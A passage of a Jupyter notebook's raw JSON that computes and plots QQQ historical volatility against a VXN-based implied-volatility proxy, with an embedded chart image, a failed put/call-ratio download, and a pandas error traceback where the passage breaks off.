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i8gXcL8kXcb8kX8T9kij4XrclRVCNrGWIloRU0kS8Udujm2oWuqjKzcLLZquT5VL04qiAIt/27T9sarbHxDYmzr7bXuf/x78n5Iu0SvtlSop/hFI+OXwvPz8f119/PXRdV4FUSkqKtzeJiIiIiIj8TGi4NdOanORD2onDUOGUNExP2wOYhlYxcJKQySVgii6brU6CJ1muKpz8p38w1UL2Cwml5JSXCUQneHuLiIKPz4RSaWlpiI2NRUREBF577TXs27cP77//vvN3Qn4n6xAREREREdWHGlreWk4m+o23oygfOL5fQ2iEFTxJaxcGTsGlXR8D63+ynvT9mzX0HMWyJyJP85nD7ujRozF79mx1/scff1QNy2bMmKGWO05PP/20tzeTiIiIiIgCQHgU0LqHiZQOVnUUA6ngk9hWqt+sIGr/Rj+arowogHitUmrbtm3VXv7hhx+8sEVEREREREQUTNVzMoRPZmmU3mMlhUCoNQEeEXkIvw8gIiIiIiKioCShlDDsGg5tY7UUkacxlCIiIiIiIqKg1KqbiZCwsiF8mxlKEXkaQykiIiIiIiIKSrZQoFV3K5Q6sFmDYXh7i4iCC0MpIiIiIiIiQrAP4SvK05C2x9tbQxRcGEoRERERERFR0Grb2wS0smqpTfyITORJfMURERERERFR0IqMBVI6WOf3b2JfKSJPYihFREREREREQa1db6uZVNYxDdlp3t4aouDBUIqIiIiIiIiCWtu+1vA9wWopIs9hKEVERERERERBrVkLICbJCqb2s68Ukcfw1UZERERERERBTdNkCJ8VSh3bLTPxeXuLiIIDQykiIiIiIiIKeu3KhvCZhoaDWzmEj8gTGEoRERERERFR0GvR2URohGMIH0MpIk9gKEVERERERERBT7cBbXpZoZRUStlLvb1FRIGPoRQRERERERGRDOHrY4VSJYUaju5itRSRuzGUIiIiIiIiIgLQpqcJTbeCqQMcwkfkdgyliIiIiIiIiACER1m9pRx9pUzrLBG5CUMpIiIiIiIiojJty4bw5WZoOHHY21tDFNgYShERERERERFV6isl9m/mED4id2IoRURERERERFQmLhmIb1E2hG8jPzITuRNfYURERERERERVVEul7wcKsr29NUSBi6EUERERERERkYt2fQzrjKnhAIfwEbkNQykiIiIiIiIiF8kdgPDo8ln4iMg9GEoRERERERERudB1oG1vK5Q6tF1DabG3t4goMDGUIiIiIiIiIqqmr5S9RMPhVFZLEbkDQykiIiIiIiKiSlr3MKHbOISPyJ0YShERERERERFVEhoOtOpmhVLS7Nws631ORE2HoRQRERERERFRFdr1tUKpgmwNxw94e2uIAg9DKSIiIiIiIqIqOJqdi/2b+PGZqKnxVUVERERERERUhehmQGJb9pUicheGUkRERERERETVaFdWLZV5SENuhre3hiiwMJQiIiIiIiIiqka7vuUdzqXhORE1HYZSRERERERERNVIbANExXMIH5E7MJQiIiIiIiIiqoamAW37WKHUkR0aigu9vUVEgYOhFBEREREREVEN2pWFUoZdw6GtrJYiaioMpYiIiIiIiIhq0KqriZAwDuEjamoMpYiIiIiIiIhqYAsFWvewQqkDWzQYdus8ETUOQykiIiIiIiKiOg7hK8rTcGhH+Yx8RNRwDKWIiIiIiIiIatGmlwloVjC18zeGUkRNgaEUERERERERUS0iY4GUDtb5nWvt3t4cooDAUIqIiIiIiIioDtr1sSqkMg6b2LeRDc+JGouhFBEREREREVEddBxoQrdZQ/gWvq1j5yoGU0SNwVCKiIiIiIiIqA5ik4AxfzAQEgqYhoalH9uwaRGDKaKGYihFREREREREVEft+5q48P4whEZYFVOrv7FhzXc6TOsiEdUDQykiIiIiIiKiemjbw4Ypt9oRGWslURsX6Pj1Ux0G+58T1QtDKSIiIiIiIqJ6SmwNTLnNjthkK5jasVLHond0lBZ7e8uI/IdXQqni4mJMmzYNK1asqHadzZs3Y8aMGRgwYAAuuOACbNy40aPbSERERERERFRbjympmEpsYwVT+zfpmPu6DcUF3t4yIv/g8VCqqKgId911F1JTU6tdJz8/HzfeeCOGDh2KL774AoMGDcJNN92klhMRERERERH5ishY4Mw/29Gyq6EuH9ul4Yf/2JCf7e0tI/J9Hg2lduzYgYsuugj79u2rcb3Zs2cjPDwc9913H7p06YKHHnoI0dHR+OGHHzy2rURERERERER1ERYBTLjBQPt+VjCVeVjDnJdtyE739pYR+bYQT97YypUrMWLECNx5550YOHBgteutX78eQ4YMgaZZU2vKz8GDB2PdunU4//zzq/w/xcUl1V6fpmsIDQmp27qahtD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VEBVJ5VHl0Kimy2XVSqbhxlBJKn8iyoKjsrDIGSQ5wyazbLksqxgyhYbLsDm3bh4FWig1evRoPPPMMzj//PMRExOD1157DY899hj+97//qf5Tr7/+OqKirIZ1RERERERERP6kWQtgalkwlXVMw+7fdFVRdMbVhgpR3EWGyaXv1XBsD3Bst4aMQ9YwOcPu3lApJLyKEKm2aiVHqBQhQxTdunkU7I3Om1paWo7bb0PG/Ep3+/T0HL8ao0mBjfsl+SLul+SLuF8S+R++bikQ90upkJKhfOn7rFAoub2J8TfYERHd+G2T7ck7YYVPaXs09TPzkNVovb5sobWESBEulUquQ+DKLtfS8orcvF+mpNRtdkBv85lKKSIiIiIiIqJAJ+GT9Jha9I6OQ9t0FU798B8bJt5oR3RC/a7LsAMZB4Fje8pDqPys6gOouBQTyR1MRMXVXrnkjWGFFHy4mxERERERERF5kAzXG3edgV8+Bnav1ZF1VMOcl22YeJMd8S2q/39FeUCaGopnBVDp+6Q3VNUhlB5iIrkd0LyjiZROpvoZEeO++0TUEAyliIiIiIiIiDxMKpFOu9xAeDSwdamOvBMa5vzHhvHX21VjdBmClZ1WVgW12wqiJLyqTkSsFTw1LwugEtuy2ol8H3dRIiIiIiIiIi+QGeKGn2cgMtbE2jk2FOVp+Om/NrTsaqqKKLlc9X80kdASzgooCaJiEq2+QkT+hKEUERERERERkZdIkNR/ogyts2P55zpKizUc2KydNJNdSgcJoKwgKqW91f+JyN8xlCIiIiIiIiLysu4jTYRHG1j2mY6QMFjD8MoqoZq1AnTd21tI1PQYShERERERERH5gA79TXTob/f2ZhB5DLNWIiIiIiIiIiLyOIZSRERERERERETkcQyliIiIiIiIiIjI4xhKERERERERERGRxzGUIiIiIiIiIiIij2MoRUREREREREREHsdQioiIiIiIiIiIPI6hFBEREREREREReRxDKSIiIiIiIiIi8jiGUkRERERERERE5HEMpYiIiIiIiIiIyOM00zRNz98sEREREREREREFM1ZKERERERERERGRxzGUIiIiIiIiIiIij2MoRUREREREREREHsdQioiIiIiIiIiIPM5vQqmjR4/itttuw/Dhw3HaaafhmWeeQVFRkfrd/v378Yc//AEDBw7E1KlTsXTp0gr/d9asWZg8eTIGDRqEGTNmYM2aNRV+/+GHH2LMmDEYPHiwuo0TJ07UuC2//vorpk2bhgEDBuCqq65St++Qn5+Phx9+GCNGjMCwYcPwyCOPIC8vr8br27x5s9ouub4LLrgAGzdurHK9//73v/jLX/5S62NFnhOs+6XMj/Dyyy/j9NNPV9d3xx13ICMjo16PHblPIO+XDqtXr8b48eNPWj506FD06NGjwqmu10nuFcj75aJFi3Duueeq7Tv77LMxf/78CsfL119/HePGjVPbd/XVV2PHjh31euyIvMVfXreu3nzzTfV6q01dr0+OB/Keh3xHsO6Xch+ffPJJjBw5Up0effRR9TeLfEMg75cO33zzDa688kq4ysrKOum9t7yHqhfTDxiGYV500UXm9ddfb27fvt1ctWqVOXHiRPPvf/+7+t3ZZ59t3n333eaOHTvMV1991RwwYIB58OBB9X8XL15s9u/f3/z666/NPXv2mC+++KI5ePBg88iRI+r333//vfr9Dz/8YG7bts288MILzTvvvLPabZHrHThwoDlz5ky1Lbfffrs5bdo0tR3ioYceMs8991zz999/Nzdu3Giec8455sMPP1zt9eXl5ZmjRo1S90W2/8knnzRPPfVUtdzVt99+a/bq1cu8//77m+hRpcYK5v3y448/Nk8//XRzxYoVavsuvfRS8+abb27iR5gaIpD3S4etW7eq/XHs2LEVlst2du/e3dy3b5957Ngx58lxe+Q9gbxfbtmyxezTp4/57rvvqu374IMP1GVZLj766CNzxIgR5oIFC8xdu3aZDz74oDlmzBgzPz+/iR9louB93TrI8V+2o/Lfh4Ze3+uvv67+rrz00kuNeCSpKQXzfvnCCy+oyxs2bDDXr19vTpkyRb1HJ+8L5P3SYdmyZWr9K664wnS1evVqc/jw4RXee6enp5v14RehlDx58gchLS2tQkgzevRo89dff1UPumuIc/XVVzv/eNxxxx3mo48+WuH6Jk2aZH766afq/PTp082XX37Z+buVK1eaZ511lllaWlrltvzrX/+q8ETIm8pBgwaZy5cvV5cff/xx9cQ4yJtUOWBU57PPPjPHjRvn3Enkp+zAs2bNUpdLSkrU9vfr109tN0Mp3xHM+6UEUHKQdZg/f766v+R9gbxfOgJRuQ/yx73yH9FffvlFhankewJ5v3z++efN666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o6+urpaamamVlZQ4PTIW4aNEimUoxPz9fpl3GlIslJSWy7oYNG7QZM2ZohYWFDutVVlbK8pMnT8pyTM386tUrLTw8XIuJiXG6L+/fv9fGjx8v28H24uLiZHrO2tpaWb5nzx6ZVjE7O1t78eKFtnjxYm39+vVOy8OUs/7+/tqOHTu0goIC+Ykpze2njNQlJibKg8zBm+MS05bOmzdPpiTNy8uT6c8xFai+PWo5Vo5Le5cuXao3hS3idM6cOTLlLbaHfcPUtc6mzCXjWDkuU1JStAkTJmg5OTkO+1deXi7L8dmI11daWuqwvKqq6i8fZSLvPW/dfT80pzxMf65P3U4tz5vjMioqSgsLC5PvpufPn8vv8fHxzTyi9DdYOS7t4bMQn4n21qxZo4WEhEg96OXLl9rSpUu16OhorSk8IimFA+rj49PgA4qKirRly5Zpfn5+WnBwsJaVlSXP48CjotjQevqXC/4mLS1N3mgEB4JCr0g6c+fOHS0wMFDKXrFihVZcXGxb9uPHDy05OVku4CdNmiRJJFzgu4I3MDQ0VIIHQZabm9vg3zEpZS7eHJfV1dVS3uzZs7WpU6fKh+zXr1+bdTzp77B6XLr6EkVcIqGA8iZOnChfkkgEUMuzclwGBQU1uH9YD5VKZ68bMUxkZp503v7JRVZjy2NSyly8OS6/f/+uJSUladOnT5d93Lp1qy1xQS3L6nHpKimlx+W0adOk3pSQkCDPNUUr/NP4flVERERERERERETN5zFjShERERERERERkXUwKUVERERERERERIZjUoqIiIiIiIiIiAzHpBQRERERERERERmOSSkiIiIiIiIiIjIck1JERERERERERGQ4JqWIiIiIiIiIiMhwTEoREREREREREZHhmJQiIiIiIiIiIiLDMSlFRERERERERESGY1KKiIiIiIiIiIgMx6QUEREREREREREpo/0PMV0jmPqEjw8AAAAASUVORK5CYII=", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + }, + { + "data": { + "text/html": [ + "
\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + "
hv20iv_proxyiv_hv_ratio
Date
2026-04-070.2170190.28431.310025
2026-04-080.2436780.25241.035793
2026-04-090.2448420.23500.959803
2026-04-100.2359040.23090.978790
2026-04-130.2343830.23310.994526
\n", + "
" + ], + "text/plain": [ + " hv20 iv_proxy iv_hv_ratio\n", + "Date \n", + "2026-04-07 0.217019 0.2843 1.310025\n", + "2026-04-08 0.243678 0.2524 1.035793\n", + "2026-04-09 0.244842 0.2350 0.959803\n", + "2026-04-10 0.235904 0.2309 0.978790\n", + "2026-04-13 0.234383 0.2331 0.994526" + ] + }, + "execution_count": 17, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "# IV proxy vs HV (last 30 trading days)\n", + "qqq_hist = yf.download(\"QQQ\", period=\"1y\", auto_adjust=True, progress=False)\n", + "qqq_close = qqq_hist[\"Close\"]\n", + "if isinstance(qqq_close, pd.DataFrame):\n", + " qqq_close = qqq_close.iloc[:, 0]\n", + "qqq_close = qqq_close.dropna()\n", + "\n", + "hv20_full = qqq_close.pct_change().rolling(20).std() * np.sqrt(252)\n", + "\n", + "# VXN 作为 QQQ 隐含波动代理(百分比 -> 小数)\n", + "vxn_df = yf.download(\"^VXN\", period=\"1y\", auto_adjust=True, progress=False)\n", + "if vxn_df.empty:\n", + " iv_proxy_full = pd.Series(dtype=float, name=\"iv_proxy\")\n", + "else:\n", + " vxn_close = vxn_df[\"Close\"]\n", + " if isinstance(vxn_close, pd.DataFrame):\n", + " vxn_close = vxn_close.iloc[:, 0]\n", + " iv_proxy_full = (vxn_close / 100.0).rename(\"iv_proxy\")\n", + "\n", + "iv_hv = pd.concat([hv20_full.rename(\"hv20\"), iv_proxy_full], axis=1).dropna()\n", + "iv_hv_30 = iv_hv.tail(30).copy()\n", + "iv_hv_30[\"iv_hv_ratio\"] = iv_hv_30[\"iv_proxy\"] / iv_hv_30[\"hv20\"]\n", + "\n", + "fig, ax = plt.subplots(2, 1, figsize=(12, 7), sharex=True)\n", + "ax[0].plot(iv_hv_30.index, iv_hv_30[\"hv20\"], label=\"HV20 (QQQ)\", linewidth=1.6)\n", + "ax[0].plot(iv_hv_30.index, iv_hv_30[\"iv_proxy\"], label=\"IV Proxy (VXN/100)\", linewidth=1.6)\n", + "ax[0].set_title(\"IV Proxy vs HV20 (Last 30 Trading Days)\")\n", + "ax[0].legend(loc=\"upper left\")\n", + "\n", + "ax[1].plot(iv_hv_30.index, iv_hv_30[\"iv_hv_ratio\"], label=\"IV/HV ratio\", color=\"#8b5cf6\", linewidth=1.8)\n", + "ax[1].axhline(1.0, color=\"#64748b\", linestyle=\"--\", label=\"fair line = 1.0\")\n", + "ax[1].axhline(1.2, color=\"#22c55e\", linestyle=\":\", label=\"sell-vol preferred >= 1.2\")\n", + "ax[1].set_title(\"IV/HV Ratio (Last 30 Trading Days)\")\n", + "ax[1].legend(loc=\"upper left\")\n", + "plt.tight_layout()\n", + "plt.show()\n", + "\n", + "iv_hv_30.tail()" + ] + }, + { + "cell_type": "code", + "execution_count": 18, + "id": "90a0f336", + "metadata": {}, + "outputs": [ + { + "name": "stderr", + "output_type": "stream", + "text": [ + "HTTP Error 404: {\"quoteSummary\":{\"result\":null,\"error\":{\"code\":\"Not Found\",\"description\":\"Quote not found for symbol: ^PCALL\"}}}\n", + "$^PCALL: possibly delisted; no price data found (period=3mo) (Yahoo error = \"No data found, symbol may be delisted\")\n", + "\n", + "1 Failed download:\n", + "['^PCALL']: possibly delisted; no price data found (period=3mo) (Yahoo error = \"No data found, symbol may be delisted\")\n" + ] + }, + { + "name": "stdout", + "output_type": "stream", + "text": [ + "未能从 ^PCALL 获取30天PCR时间序列。\n", + "替代方案:使用当前期权链横截面估算 PCR(按成交量/持仓量),并在日更任务中落盘形成时间序列。\n" + ] + } + ], + "source": [ + "# PCR 30-day trend (preferred: ^PCALL)\n", + "pcr_df = yf.download(\"^PCALL\", period=\"3mo\", auto_adjust=True, progress=False)\n", + "\n", + "if not pcr_df.empty:\n", + " pcr = pcr_df[\"Close\"].dropna().tail(30)\n", + " fig, ax = plt.subplots(figsize=(12, 4))\n", + " ax.plot(pcr.index, pcr.values, color=\"#f59e0b\", linewidth=1.8, label=\"PCR (^PCALL)\")\n", + " ax.axhline(pcr.mean(), color=\"#64748b\", linestyle=\"--\", label=f\"30d mean={pcr.mean():.2f}\")\n", + " ax.set_title(\"Put/Call Ratio (Last 30 Trading Days)\")\n", + " ax.legend(loc=\"upper left\")\n", + " plt.show()\n", + " display(pcr.tail().to_frame(\"PCR\"))\n", + "else:\n", + " print(\"未能从 ^PCALL 获取30天PCR时间序列。\")\n", + " print(\"替代方案:使用当前期权链横截面估算 PCR(按成交量/持仓量),并在日更任务中落盘形成时间序列。\")" + ] + }, + { + "cell_type": "code", + "execution_count": 19, + "id": "c4e2c01f", + "metadata": {}, + "outputs": [ + { + "ename": "ValueError", + "evalue": "If using all scalar values, you must pass an index", + "output_type": "error", + "traceback": [ + "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m", + "\u001b[0;31mValueError\u001b[0m Traceback (most recent call last)", + "Cell \u001b[0;32mIn[19], line 5\u001b[0m\n\u001b[1;32m 2\u001b[0m qqq_30 \u001b[38;5;241m=\u001b[39m 